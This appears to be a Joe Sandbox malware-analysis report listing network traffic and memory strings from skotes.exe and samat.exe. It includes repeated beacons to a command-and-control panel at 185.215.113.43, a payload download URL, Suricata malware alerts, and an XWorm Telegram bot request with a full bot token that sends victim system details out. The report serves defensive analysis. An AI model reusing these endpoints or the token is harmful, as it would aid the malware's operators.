Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 30 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008030001&unit=246122658369
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 23.57.90.111 23.57.90.111
Source: Joe Sandbox View IP Address: 152.195.19.97 152.195.19.97
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:50337 -> 20.189.173.5:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50147 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49824 -> 188.165.52.14:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: global traffic HTTP traffic detected: GET /samat.exe HTTP/1.1Host: thedotmediagroup.com
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.48132e5427deb971ee28.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.0af827ee54246cc151b3.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.b23f2c737ccf14018cf8.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732828390&P2=404&P3=2&P4=AWOCGn%2f5q6RNxVS7%2fjhSYDCixRz%2bmQY0jaYBCPiSYbzX2yFPRgPPwARFz4cZHf%2fElpV3Q%2fz95o15ZDniXBTs1g%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: X9nsUlIue40Lh2xDAXDu2pSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1732223700869&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=4a15e35cafd94d159c0b19139d533c19&activityId=4a15e35cafd94d159c0b19139d533c19&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=13B8460915C043F29EE15DCA68DCD589&MUID=00AA082B214465520B5C1D15206D642A HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=00AA082B214465520B5C1D15206D642A; _EDGE_S=F=1&SID=1E0A64B8A5A8631F16D67186A4B1627A; _EDGE_V=1; SM=T
Source: global traffic HTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: - https://www.facebook.com/groups/ equals www.facebook.com (Facebook)
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: d- https://www.facebook.com/groups/ equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: thedotmediagroup.com
Source: global traffic DNS traffic detected: DNS query: api.myip.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.../back.jpeg
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php$
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php5
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php58
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php8
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php9001
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php=
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpA
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpca-11ee-8c18-806e6f6e699
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpe
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
Source: skotes.exe, 00000006.00000003.4983776044.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC990000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524775758.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530017261.000001BCCD41D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561540067.000001BCCCAD7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD427000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.dig
Source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digi
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, 